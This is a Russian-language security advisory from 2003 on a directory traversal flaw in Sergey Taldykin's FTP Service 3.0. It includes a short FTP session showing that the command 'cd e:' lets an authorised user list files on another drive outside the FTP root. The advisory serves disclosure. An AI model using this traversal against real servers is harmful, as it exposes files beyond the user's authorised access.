Доступ к произвольным файлам вне FTP директории в FTP сервере от Сергея Тадыкина

Дата публикации:
27.05.2003
Всего просмотров:
1185
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в FTP сервере от Сергея Тадыкина. Удаленный авторизованный пользователь может просматривать файлы на системе, расположенные вне FTP директории.

Damage Hacking Group сообщает, что удаленный авторизованный пользователь может выполнить CD команду с другим именем диска (например "cd e”) и просматривать файлы на этом диске. Пример:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>ftp 127.0.0.1
Connected to 127.0.0.1.
220-
220 Service ready for new user.
User (127.0.0.1:(none)):
230 User  logged in, proceed.
ftp> pwd
257 "/" is working directory.
ftp> ls
200 PORT command okay.
150 File status okay; about to open data connection.
226 Closing data connection.
ftp> cd e:
250 Requested file action okay, completed.
ftp> pwd
257 "e:" is working directory.
ftp> ls
200 PORT command okay.
150 File status okay; about to open data connection.
03-05-03  12:58PM       <DIR>          video
05-21-03  05:46PM             267964416 hiberfil.sys
02-18-03  04:18AM       <DIR>          Documents and Settings
03-11-03  12:00PM       <DIR>          Program Files
05-21-03  05:46PM             402653184 pagefile.sys
02-18-03  07:31AM       <DIR>          System Volume Information
02-18-03  07:37AM       <DIR>          Recycled
04-27-03  05:21PM                  214 firewall.log
03-09-03  07:09PM       <DIR>          WINDOWS
01-03-02  10:15PM       <DIR>          shit
01-12-02  12:10AM       <DIR>          MSSQL7
226 Closing data connection.
ftp: 579 bytes received in 0,00Seconds 579000,00Kbytes/sec.
ftp> bye
221-
221 Service closing control connection.

C:\>
Уязвимость обнаружена в Sergey Taldykin's FTP Service 3.0

Ссылки: ST FTP Service v3.0: directory traversal
или введите имя

CAPTCHA